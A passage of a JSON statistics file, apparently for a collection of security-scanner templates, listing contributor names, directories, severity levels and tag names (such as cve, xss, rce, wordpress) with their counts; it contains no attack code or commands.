crosser","count":31},{"name":"iamnoooob","count":27},{"name":"rootxharsh","count":26},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":24},{"name":"pwnhxl","count":24},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"johnk3r","count":22},{"name":"j4vaovo","count":19},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"parthmalhotra","count":16},{"name":"pr3r00t","count":15},{"name":"random-robbie","count":15},{"name":"sheikhrishad","count":15},{"name":"ctflearner","count":14},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"tenbird","count":13},{"name":"suman_kar","count":12},{"name":"lu4nx","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"dogasantos","count":11},{"name":"elsfa7110","count":11},{"name":"logicalhunter","count":10},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"co5mos","count":10},{"name":"meme-lord","count":10},{"name":"nadino","count":10},{"name":"fabaff","count":9},{"name":"oppsec","count":9},{"name":"0x240x23elu","count":9},{"name":"nullfuzz","count":9},{"name":"emadshanab","count":9},{"name":"0xpugazh","count":9},{"name":"veshraj","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"_0xf4n9x_","count":8},{"name":"olearycrew","count":8},{"name":"aashiq","count":8},{"name":"amit-jd","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"caspergn","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":7},{"name":"divya_mudgal","count":7},{"name":"its0x08","count":7},{"name":"dr_set","count":7},{"name":"xelkomy","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"puzzlepeaches","count":6},{"name":"clem9669","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"nodauf","count":6},{"name":"justaacat","count":6},{"name":"imnightmaree","count":6},{"name":"gitlab red team","count":6},{"name":"pentest_swissky","count":6},{"name":"ja1sh","count":6},{"name":"devang-solanki","count":6},{"name":"pathtaga","count":6},{"name":"prajiteshsingh","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"robotshell","count":5},{"name":"vicrack","count":5},{"name":"ganofins","count":5},{"name":"r12w4n","count":5},{"name":"kh4sh3i","count":5},{"name":"s0obi","count":5},{"name":"podalirius","count":5},{"name":"defr0ggy","count":5},{"name":"mr-xn","count":5},{"name":"panch0r3d","count":5},{"name":"wisnupramoedya","count":4},{"name":"h1ei1","count":4},{"name":"shine","count":4},{"name":"powerexploit","count":4},{"name":"scent2d","count":4},{"name":"e_schultze_","count":4},{"name":"3th1c_yuk1","count":4},{"name":"r3naissance","count":4},{"name":"dolev farhi","count":4},{"name":"incogbyte","count":4},{"name":"dadevel","count":4},{"name":"tanq16","count":4},{"name":"vsh00t","count":3},{"name":"shifacyclewala","count":3},{"name":"ambassify","count":3},{"name":"sushantkamble","count":3},{"name":"cheesymoon","count":3},{"name":"huowuzhao","count":3},{"name":"canberbamber","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"arcc","count":3},{"name":"jarijaas","count":3},{"name":"davidmckennirey","count":3},{"name":"mavericknerd","count":3},{"name":"k0pak4","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"dudez","count":3},{"name":"bernardofsr","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"dr0pd34d","count":3},{"name":"evergreencartoons","count":3},{"name":"matt galligan","count":3},{"name":"splint3r7","count":3},{"name":"me9187","count":3},{"name":"alifathi-h1","count":3},{"name":"thomas_from_offensity","count":3},{"name":"ekrause","count":3},{"name":"fyoorer","count":3},{"name":"kazet","count":3},{"name":"true13","count":3},{"name":"andydoering","count":3},{"name":"ph33r","count":3},{"name":"impramodsargar","count":3},{"name":"lucasljm2001","count":3},{"name":"johnjhacking","count":3},{"name":"taielab","count":3},{"name":"atomiczsec","count":3},{"name":"fxploit","count":3},{"name":"hahwul","count":3},{"name":"z3bd","count":3},{"name":"swissky","count":3},{"name":"vagnerd","count":3},{"name":"lark-lab","count":3},{"name":"badboycxcc","count":3},{"name":"whoever","count":3},{"name":"binaryfigments","count":3},{"name":"bing0o","count":2},{"name":"shelled","count":2},{"name":"lum8rjack","count":2},{"name":"zomsop82","count":2},{"name":"paperpen","count":2},{"name":"myztique","count":2},{"name":"martincodes-de","count":2},{"name":"hackerarpan","count":2},{"name":"8arthur","count":2},{"name":"rafaelwdornelas","count":2},{"name":"y4er","count":2},{"name":"socketz","count":2},{"name":"udit_thakkur","count":2},{"name":"gal nagli","count":2},{"name":"heeress","count":2},{"name":"0xrudra","count":2},{"name":"streetofhackerr007","count":2},{"name":"cckuakilong","count":2},{"name":"notnotnotveg","count":2},{"name":"lotusdll","count":2},{"name":"koti2","count":2},{"name":"nybble04","count":2},{"name":"megamansec","count":2},{"name":"dbrwsky","count":2},{"name":"brenocss","count":2},{"name":"ajaysenr","count":2},{"name":"sascha brendel","count":2},{"name":"convisoappsec","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"luci","count":2},{"name":"foulenzer","count":2},{"name":"z0ne","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"kre80r","count":2},{"name":"sinkettu","count":2},{"name":"joshua rogers","count":2},{"name":"kishore-hariram","count":2},{"name":"supras","count":2},{"name":"github.com/its0x08","count":2},{"name":"korteke","count":2},{"name":"joshlarsen","count":2},{"name":"bhutch","count":2},{"name":"redteambrasil","count":2},{"name":"amsda","count":2},{"name":"wa1tf0rme","count":2},{"name":"randomdhiraj","count":2},{"name":"nuk3s3c","count":2},{"name":"0xsapra","count":2},{"name":"randomrobbie","count":2},{"name":"dheerajmadhukar","count":2},{"name":"thardt-praetorian","count":2},{"name":"0xelkomy","count":2},{"name":"bananabr","count":2},{"name":"parth","count":2},{"name":"uomogrande","count":2},{"name":"maximus decimus","count":2},{"name":"geekby","count":2},{"name":"0xnirvana","count":2},{"name":"sbani","count":2},{"name":"hetroublemakr","count":2},{"name":"arm!tage","count":2},{"name":"666asd","count":2},{"name":"dogancanbakir","count":2},{"name":"v0idc0de","count":2},{"name":"codexlynx","count":2},{"name":"smaranchand","count":2},{"name":"nvn1729","count":2},{"name":"danielmofer","count":2},{"name":"sy3omda","count":2},{"name":"ree4pwn","count":2},{"name":"coldfish","count":2},{"name":"manas_harsh","count":2},{"name":"moritz nentwig","count":2},{"name":"afaq","count":2},{"name":"mohammedsaneem","count":2},{"name":"joeldeleep","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"j3ssie","count":2},{"name":"paradessia","count":2},{"name":"0xcrypto","count":2},{"name":"d4vy","count":2},{"name":"vavkamil","count":2},{"name":"g4l1t0","count":2},{"name":"w4cky_","count":2},{"name":"n-thumann","count":2},{"name":"ehsahil","count":2},{"name":"thezakman","count":2},{"name":"nkxxkn","count":2},{"name":"raesene","count":2},{"name":"k11h-de","count":2},{"name":"0xsmiley","count":2},{"name":"c3l3si4n","count":2},{"name":"clarkvoss","count":2},{"name":"bsysop","count":2},{"name":"pxmme1337","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"gevakun","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"cocxanh","count":2},{"name":"dahse89","count":2},{"name":"dale clarke","count":1},{"name":"rojanrijal","count":1},{"name":"hexcat","count":1},{"name":"miryangjung","count":1},{"name":"yuansec","count":1},{"name":"open-sec","count":1},{"name":"arr0way","count":1},{"name":"sherlocksecurity","count":1},{"name":"galoget","count":1},{"name":"5up3r541y4n","count":1},{"name":"booboohq","count":1},{"name":"hazana","count":1},{"name":"ringo","count":1},{"name":"rubina119","count":1},{"name":"exid","count":1},{"name":"pudsec","count":1},{"name":"dwbzn","count":1},{"name":"kiransau","count":1},{"name":"skylark-lab","count":1},{"name":"mihhailsokolov","count":1},{"name":"vzamanillo","count":1},{"name":"harshinsecurity","count":1},{"name":"ooooooo_q","count":1},{"name":"evan rubinstien","count":1},{"name":"thebinitghimire","count":1},{"name":"miroslavsotak","count":1},{"name":"mukundbhuva","count":1},{"name":"kchason","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"affix","count":1},{"name":"mzack9999","count":1},{"name":"ling","count":1},{"name":"viniciuspereiras","count":1},{"name":"x6263","count":1},{"name":"pdp","count":1},{"name":"httpvoid","count":1},{"name":"rschio","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"tim_koopmans","count":1},{"name":"noobexploiter","count":1},{"name":"luqmaan hadia","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"lingtren","count":1},{"name":"makyotox","count":1},{"name":"screamy","count":1},{"name":"alex","count":1},{"name":"act1on3","count":1},{"name":"push4d","count":1},{"name":"ggranjus","count":1},{"name":"jiheon-dev","count":1},{"name":"zhenwarx","count":1},{"name":"knassar702","count":1},{"name":"evolutionsec","count":1},{"name":"calumjelrick","count":1},{"name":"lrtk-coder","count":1},{"name":"hardik-rathod","count":1},{"name":"clment cruchet","count":1},{"name":"francescocarlucci","count":1},{"name":"sickwell","count":1},{"name":"liquidsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"omarjezi","count":1},{"name":"natto97","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"fopina","count":1},{"name":"w0tx","count":1},{"name":"bugvsme","count":1},{"name":"xshuden","count":1},{"name":"am0nt31r0","count":1},{"name":"2rs3c","count":1},{"name":"af001","count":1},{"name":"husain","count":1},{"name":"hakimkt","count":1},{"name":"amnotacat","count":1},{"name":"jonathanwalker","count":1},{"name":"petergrifin","count":1},{"name":"zandros0","count":1},{"name":"cookiehanhoan","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"0xrod","count":1},{"name":"noamrathaus","count":1},{"name":"charanrayudu","count":1},{"name":"naglis","count":1},{"name":"philippdelteil","count":1},{"name":"_darrenmartyn","count":1},{"name":"arall","count":1},{"name":"brabbit10","count":1},{"name":"zy9ard3","count":1},{"name":"bad5ect0r","count":1},{"name":"0xceeb","count":1},{"name":"j33n1k4","count":1},{"name":"jcockhren","count":1},{"name":"sshell","count":1},{"name":"regala_","count":1},{"name":"marcio mendes","count":1},{"name":"houdinis","count":1},{"name":"mesaglio","count":1},{"name":"stupidfish","count":1},{"name":"p-l-","count":1},{"name":"elouhi","count":1},{"name":"ayadim","count":1},{"name":"chron0x","count":1},{"name":"shockwave","count":1},{"name":"iphantasmic","count":1},{"name":"palanichamy_perumal","count":1},{"name":"kiks7","count":1},{"name":"manuelbua","count":1},{"name":"lethargynavigator","count":1},{"name":"s1r1u5_","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"udinchan","count":1},{"name":"failopen","count":1},{"name":"jeya seelan","count":1},{"name":"droberson","count":1},{"name":"tirtha","count":1},{"name":"juicypotato1","count":1},{"name":"co0nan","count":1},{"name":"shifacyclewla","count":1},{"name":"micha3lb3n","count":1},{"name":"juliosmelo","count":1},{"name":"gtrrnr","count":1},{"name":"becivells","count":1},{"name":"akash.c","count":1},{"name":"orpheus","count":1},{"name":"imhunterand","count":1},{"name":"jrolf","count":1},{"name":"ilovebinbash","count":1},{"name":"shiva (strobes security)","count":1},{"name":"barthy.koeln","count":1},{"name":"mah3sec_","count":1},{"name":"compr00t","count":1},{"name":"ramondunker","count":1},{"name":"furkansayim","count":1},{"name":"tarunkoyalwar","count":1},{"name":"kareemse1im","count":1},{"name":"undefl0w","count":1},{"name":"willd96","count":1},{"name":"ohlinge","count":1},{"name":"0xteles","count":1},{"name":"apt-mirror","count":1},{"name":"zinminphy0","count":1},{"name":"b4uh0lz","count":1},{"name":"un-fmunozs","count":1},{"name":"schniggie","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"f1she3","count":1},{"name":"0xtavian","count":1},{"name":"dievus","count":1},{"name":"nytr0gen","count":1},{"name":"aringo","count":1},{"name":"retr0","count":1},{"name":"jna1","count":1},{"name":"djoevanka","count":1},{"name":"berkdusunur","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjhulst","count":1},{"name":"narluin","count":1},{"name":"aron molnar","count":1},{"name":"noraj","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"danigoland","count":1},{"name":"davidfegyver","count":1},{"name":"pascalheidmann","count":1},{"name":"esonhugh","count":1},{"name":"arjunchandarana","count":1},{"name":"ph33rr","count":1},{"name":"_c0wb0y_","count":1},{"name":"revblock","count":1},{"name":"adrianmf","count":1},{"name":"ndmalc","count":1},{"name":"pratik khalane","count":1},{"name":"momen eldawakhly","count":1},{"name":"petruknisme","count":1},{"name":"secthebit","count":1},{"name":"mantissts","count":1},{"name":"jteles","count":1},{"name":"kurohost","count":1},{"name":"qlkwej","count":1},{"name":"th3.d1p4k","count":1},{"name":"piyushchhiroliya","count":1},{"name":"dabla","count":1},{"name":"mabdullah22","count":1},{"name":"nerrorsec","count":1},{"name":"h4kux","count":1},{"name":"topscoder","count":1},{"name":"ptonewreckin","count":1},{"name":"patralos","count":1},{"name":"queencitycyber","count":1},{"name":"hanlaomo","count":1},{"name":"rodnt","count":1},{"name":"exceed","count":1},{"name":"mastercho","count":1},{"name":"zsusac","count":1},{"name":"elitebaz","count":1},{"name":"0xh7ml","count":1},{"name":"tirtha_mandal","count":1},{"name":"soyelmago","count":1},{"name":"carrot2","count":1},{"name":"ok_bye_now","count":1},{"name":"akokonunes","count":1},{"name":"whynotke","count":1},{"name":"shreyapohekar","count":1},{"name":"lark lab","count":1},{"name":"lixts","count":1},{"name":"metascan","count":1},{"name":"luqman","count":1},{"name":"ahmed sherif","count":1},{"name":"shelld3v","count":1},{"name":"daviey","count":1},{"name":"jaimin gondaliya","count":1},{"name":"0xd0ff9","count":1},{"name":"mr. bobo hp","count":1},{"name":"duty_1g","count":1},{"name":"sak1","count":1},{"name":"florianmaak","count":1},{"name":"prettyboyaaditya","count":1},{"name":"unkl4b","count":1},{"name":"1nf1n7y","count":1},{"name":"tehtbl","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"sleepingbag945","count":1},{"name":"ynnirc","count":1},{"name":"opencirt","count":1},{"name":"nobody","count":1},{"name":"yashgoti","count":1},{"name":"0xceba","count":1},{"name":"thevillagehacker","count":1},{"name":"supr4s","count":1},{"name":"erethon","count":1},{"name":"retr02332","count":1},{"name":"udyz","count":1},{"name":"pjborah","count":1},{"name":"kagamigawa","count":1},{"name":"wabafet","count":1},{"name":"dawid-czarnecki","count":1},{"name":"r3nz0","count":1},{"name":"higor melgaço","count":1},{"name":"unp4ck","count":1},{"name":"infosecsanyam","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"toufik-airane","count":1},{"name":"igibanez","count":1},{"name":"omarkurt","count":1},{"name":"ahmed abou-ela","count":1},{"name":"yashanand155","count":1},{"name":"0ut0fb4nd","count":1},{"name":"mhdsamx","count":1},{"name":"gboddin","count":1},{"name":"bartu utku sarp","count":1},{"name":"borna nematzadeh","count":1},{"name":"b0rn2r00t","count":1},{"name":"deena","count":1},{"name":"oscarintherocks","count":1},{"name":"alevsk","count":1},{"name":"nielsing","count":1},{"name":"bywalks","count":1},{"name":"gpiechnik2","count":1},{"name":"paper-pen","count":1},{"name":"ramkrishna sawant","count":1},{"name":"osamahamad","count":1},{"name":"aayush vishnoi","count":1},{"name":"furkansenan","count":1},{"name":"kabirsuda","count":1},{"name":"rotemreiss","count":1},{"name":"allenwest24","count":1},{"name":"jub0bs","count":1},{"name":"elmahdi","count":1},{"name":"bughuntersurya","count":1},{"name":"anon-artist","count":1},{"name":"xstp","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"rotembar","count":1},{"name":"tea","count":1},{"name":"mbmy","count":1},{"name":"kaizensecurity","count":1},{"name":"colbyjack1134","count":1},{"name":"ofjaaah","count":1},{"name":"jas37","count":1},{"name":"jbertman","count":1},{"name":"ayadi","count":1},{"name":"ipanda","count":1},{"name":"pussycat0","count":1},{"name":"ola456","count":1},{"name":"mrcl0wnlab","count":1},{"name":"geraldino2","count":1},{"name":"spac3wh1te","count":1},{"name":"jaskaran","count":1},{"name":"thelicato","count":1},{"name":"amanrawat","count":1},{"name":"majidmc2","count":1},{"name":"breno_css","count":1},{"name":"dali","count":1},{"name":"hakluke","count":1},{"name":"blckraven","count":1},{"name":"wlayzz","count":1},{"name":"patrick pirker","count":1},{"name":"sinsinology","count":1},{"name":"caon","count":1},{"name":"andirrahmani1","count":1},{"name":"aaronchen0","count":1},{"name":"xcapri","count":1},{"name":"intx0x80","count":1},{"name":"vinit989","count":1},{"name":"absshax","count":1},{"name":"pry0cc","count":1},{"name":"mariam tariq","count":1},{"name":"fq_hsu","count":1},{"name":"sec_hawk","count":1},{"name":"carlosvieira","count":1},{"name":"michael wedl","count":1},{"name":"iampritam","count":1},{"name":"daffianfo","count":1},{"name":"shiar","count":1},{"name":"d0rkerdevil","count":1},{"name":"lamscun","count":1},{"name":"andysvints","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"zeyad azima","count":1},{"name":"8authur","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mass0ma","count":1},{"name":"official_blackhat13","count":1},{"name":"elder tao","count":1},{"name":"kailashbohara","count":1},{"name":"dmartyn","count":1},{"name":"aresx","count":1},{"name":"luskabol","count":1},{"name":"alexrydzak","count":1},{"name":"exploitation","count":1},{"name":"sicksec","count":1},{"name":"manasmbellani","count":1},{"name":"b0yd","count":1},{"name":"y0no","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"_harleo","count":1},{"name":"rivalsec","count":1},{"name":"remonsec","count":1},{"name":"kr1shna4garwal","count":1},{"name":"nagli","count":1},{"name":"hczdmr","count":1},{"name":"jc175","count":1},{"name":"izn0u","count":1},{"name":"akshansh","count":1},{"name":"0h1in9e","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"freakyclown","count":1},{"name":"alperenkesk","count":1},{"name":"myst7ic","count":1},{"name":"marcos_iaf","count":1},{"name":"fmunozs","count":1},{"name":"phyr3wall","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"ldionmarcil","count":1},{"name":"flag007","count":1},{"name":"ransomsec","count":1},{"name":"realexp3rt","count":1},{"name":"mubassirpatel","count":1},{"name":"justmumu","count":1},{"name":"th3r4id","count":1},{"name":"adamcrosser","count":1},{"name":"jbaines-r7","count":1},{"name":"couskito","count":1},{"name":"viondexd","count":1},{"name":"therealtoastycat","count":1},{"name":"dhiyaneshdki","count":1},{"name":"shivampand3y","count":1},{"name":"jeya.seelan","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"xeldax","count":1},{"name":"dk999","count":1}],"directory":[{"name":"http","count":5927},{"name":"workflows","count":190},{"name":"file","count":123},{"name":"network","count":96},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":2894},{"name":"high","count":1282},{"name":"medium","count":1063},{"name":"critical","count":710},{"name":"low","count":221},{"name":"unknown","count":27}],"types":[{"name":"file","count":123},{"name":"dns","count":18}]} +{"tags":[{"name":"cve","count":1908},{"name":"panel","count":909},{"name":"wordpress","count":787},{"name":"exposure","count":692},{"name":"wp-plugin","count":678},{"name":"xss","count":660},{"name":"osint","count":652},{"name":"tech","count":614},{"name":"edb","count":597},{"name":"lfi","count":557},{"name":"cve2021","count":434},{"name":"rce","count":427},{"name":"cve2022","count":401},{"name":"packetstorm","count":369},{"name":"wpscan","count":348},{"name":"misconfig","count":305},{"name":"wp","count":291},{"name":"unauth","count":272},{"name":"token-spray","count":240},{"name":"cve2020","count":237},{"name":"top-200","count":208},{"name":"osint-social","count":207},{"name":"authenticated","count":204},{"name":"sqli","count":203},{"name":"kev","count":200},{"name":"config","count":195},{"name":"","count":194},{"name":"oast","count":169},{"name":"token","count":157},{"name":"apache","count":151},{"name":"cve2018","count":150},{"name":"iot","count":149},{"name":"cve2019","count":148},{"name":"default-login","count":147},{"name":"joomla","count":136},{"name":"file","count":135},{"name":"login","count":130},{"name":"redirect","count":115},{"name":"cve2010","count":112},{"name":"top-100","count":100},{"name":"files","count":100},{"name":"cve2023","count":99},{"name":"router","count":97},{"name":"network","count":96},{"name":"ssrf","count":96},{"name":"cms","count":95},{"name":"auth-bypass","count":79},{"name":"cve2017","count":77},{"name":"devops","count":77},{"name":"takeover","count":73},{"name":"intrusive","count":72},{"name":"install","count":70},{"name":"disclosure","count":68},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"cisco","count":53},{"name":"google","count":53},{"name":"cve2016","count":52},{"name":"detect","count":51},{"name":"adobe","count":50},{"name":"fileupload","count":50},{"name":"tenable","count":46},{"name":"logs","count":46},{"name":"atlassian","count":45},{"name":"osint-gaming","count":45},{"name":"vmware","count":45},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"plugin","count":43},{"name":"cve2014","count":42},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"osint-porn","count":42},{"name":"huntr","count":40},{"name":"generic","count":37},{"name":"traversal","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"kubernetes","count":35},{"name":"aws","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":34},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"osint-coding","count":29},{"name":"sap","count":29},{"name":"osint-tech","count":28},{"name":"log4j","count":28},{"name":"cnvd","count":28},{"name":"gitlab","count":27},{"name":"misc","count":26},{"name":"php","count":26},{"name":"microsoft","count":26},{"name":"fuzz","count":25},{"name":"proxy","count":25},{"name":"jndi","count":25},{"name":"osint-business","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"cve2012","count":24},{"name":"api","count":24},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"zoho","count":23},{"name":"wp-theme","count":22},{"name":"c2","count":21},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"cloud","count":21},{"name":"tomcat","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"jenkins","count":19},{"name":"dns","count":19},{"name":"camera","count":19},{"name":"dlink","count":19},{"name":"ssl","count":19},{"name":"struts","count":19},{"name":"github","count":19},{"name":"admin","count":18},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"ftp","count":18},{"name":"service","count":18},{"name":"lfr","count":18},{"name":"ir","count":17},{"name":"cve2011","count":17},{"name":"xxe","count":16},{"name":"nginx","count":16},{"name":"printer","count":16},{"name":"cve2009","count":16},{"name":"backup","count":16},{"name":"osint-blog","count":16},{"name":"hp","count":15},{"name":"android","count":15},{"name":"status","count":15},{"name":"citrix","count":15},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"osint-health","count":14},{"name":"woocommerce","count":14},{"name":"java","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"audit","count":14},{"name":"confluence","count":14},{"name":"nodejs","count":14},{"name":"cve2013","count":14},{"name":"zyxel","count":14},{"name":"mail","count":14},{"name":"domainmod","count":14},{"name":"creds-stuffing","count":13},{"name":"login-check","count":13},{"name":"azure","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"osint-dating","count":13},{"name":"cuppa","count":13},{"name":"fortigate","count":13},{"name":"laravel","count":13},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"grafana","count":12},{"name":"ruby","count":12},{"name":"enum","count":12},{"name":"git","count":12},{"name":"webserver","count":12},{"name":"auth","count":12},{"name":"vpn","count":12},{"name":"microweber","count":12},{"name":"rails","count":12},{"name":"dashboard","count":12},{"name":"backdoor","count":12},{"name":"drupal","count":12},{"name":"graphql","count":12},{"name":"netgear","count":12},{"name":"kafka","count":12},{"name":"airflow","count":12},{"name":"cnvd2021","count":11},{"name":"phpmyadmin","count":11},{"name":"online-fire-reporting","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"sonicwall","count":11},{"name":"osint-video","count":11},{"name":"docker","count":11},{"name":"cisa","count":11},{"name":"npm","count":11},{"name":"coldfusion","count":11},{"name":"digitalocean","count":10},{"name":"ssti","count":10},{"name":"glpi","count":10},{"name":"zimbra","count":10},{"name":"headless","count":10},{"name":"symfony","count":10},{"name":"spring","count":10},{"name":"ssh","count":10},{"name":"dell","count":10},{"name":"db","count":10},{"name":"dedecms","count":10},{"name":"solarview","count":10},{"name":"bypass","count":10},{"name":"django","count":10},{"name":"jolokia","count":10},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"windows","count":9},{"name":"fastjson","count":9},{"name":"sitecore","count":9},{"name":"scada","count":9},{"name":"gitea","count":9},{"name":"vcenter","count":9},{"name":"zabbix","count":9},{"name":"thinkphp","count":9},{"name":"redis","count":9},{"name":"iis","count":9},{"name":"opencats","count":9},{"name":"cache","count":9},{"name":"wso2","count":9},{"name":"versa","count":9},{"name":"prometheus","count":9},{"name":"installer","count":9},{"name":"osint-news","count":9},{"name":"pfsense","count":9},{"name":"ecology","count":8},{"name":"cisco-switch","count":8},{"name":"console","count":8},{"name":"hms","count":8},{"name":"exchange","count":8},{"name":"ognl","count":8},{"name":"mirai","count":8},{"name":"druid","count":8},{"name":"atom","count":8},{"name":"vbulletin","count":8},{"name":"config-audit","count":8},{"name":"spotweb","count":8},{"name":"recon","count":8},{"name":"icewarp","count":8},{"name":"solr","count":8},{"name":"metadata","count":8},{"name":"unauthenticated","count":8},{"name":"emerge","count":8},{"name":"elasticsearch","count":8},{"name":"default-page","count":8},{"name":"jetbrains","count":8},{"name":"crlf","count":8},{"name":"cnvd2020","count":8},{"name":"bucket","count":8},{"name":"oauth","count":8},{"name":"smtp","count":8},{"name":"odoo","count":7},{"name":"malware","count":7},{"name":"manager","count":7},{"name":"samsung","count":7},{"name":"seeyon","count":7},{"name":"nagios","count":7},{"name":"sophos","count":7},{"name":"fortios","count":7},{"name":"shopify","count":7},{"name":"go","count":7},{"name":"maps","count":7},{"name":"squirrelmail","count":7},{"name":"error","count":7},{"name":"avtech","count":7},{"name":"vms","count":7},{"name":"nagiosxi","count":7},{"name":"gogs","count":7},{"name":"ofbiz","count":7},{"name":"websphere","count":7},{"name":"ec2","count":7},{"name":"blind","count":7},{"name":"huawei","count":7},{"name":"activemq","count":6},{"name":"python","count":6},{"name":"magmi","count":6},{"name":"mongodb","count":6},{"name":"opensis","count":6},{"name":"nexus","count":6},{"name":"jeecg","count":6},{"name":"artica","count":6},{"name":"leak","count":6},{"name":"rconfig","count":6},{"name":"doctor-appointment-system","count":6},{"name":"s3","count":6},{"name":"cobbler","count":6},{"name":"elfinder","count":6},{"name":"filemanager","count":6},{"name":"keycloak","count":6},{"name":"lucee","count":6},{"name":"microstrategy","count":6},{"name":"liferay","count":6},{"name":"plesk","count":6},{"name":"kubelet","count":6},{"name":"minio","count":6},{"name":"bigip","count":6},{"name":"database","count":6},{"name":"moodle","count":6},{"name":"pmb","count":6},{"name":"newrelic","count":6},{"name":"fpd","count":6},{"name":"openvpn","count":6},{"name":"jetty","count":6},{"name":"zhiyuan","count":6},{"name":"jamf","count":6},{"name":"node","count":6},{"name":"slack","count":6},{"name":"symantec","count":6},{"name":"solarwinds","count":6},{"name":"prestashop","count":5},{"name":"firmware","count":5},{"name":"elastic","count":5},{"name":"adminer","count":5},{"name":"metinfo","count":5},{"name":"storage","count":5},{"name":"kkfileview","count":5},{"name":"nacos","count":5},{"name":"cacti","count":5},{"name":"hybris","count":5},{"name":"parallels","count":5},{"name":"alibaba","count":5},{"name":"fatpipe","count":5},{"name":"avideo","count":5},{"name":"caucho","count":5},{"name":"tikiwiki","count":5},{"name":"resin","count":5},{"name":"typo3","count":5},{"name":"rseenet","count":5},{"name":"paypal","count":5},{"name":"cockpit","count":5},{"name":"hikvision","count":5},{"name":"ruckus","count":5},{"name":"openemr","count":5},{"name":"rfi","count":5},{"name":"microfocus","count":5},{"name":"square","count":5},{"name":"heroku","count":5},{"name":"apisix","count":5},{"name":"circarlife","count":5},{"name":"carrental","count":5},{"name":"74cms","count":5},{"name":"gocd","count":5},{"name":"server","count":5},{"name":"sql","count":5},{"name":"geoserver","count":5},{"name":"awstats","count":5},{"name":"vrealize","count":5},{"name":"avaya","count":5},{"name":"strapi","count":5},{"name":"facebook","count":5},{"name":"hashicorp","count":5},{"name":"akamai","count":5},{"name":"webmin","count":4},{"name":"stored","count":4},{"name":"postmessage","count":4},{"name":"mysql","count":4},{"name":"seagate","count":4},{"name":"kevinlab","count":4},{"name":"hoteldruid","count":4},{"name":"tokens","count":4},{"name":"sangfor","count":4},{"name":"churchcrm","count":4},{"name":"ebs","count":4},{"name":"mostra","count":4},{"name":"kibana","count":4},{"name":"oa","count":4},{"name":"zend","count":4},{"name":"telerik","count":4},{"name":"springcloud","count":4},{"name":"jellyfin","count":4},{"name":"age-encryption","count":4},{"name":"cve2005","count":4},{"name":"phppgadmin","count":4},{"name":"aspose","count":4},{"name":"pixie","count":4},{"name":"powerjob","count":4},{"name":"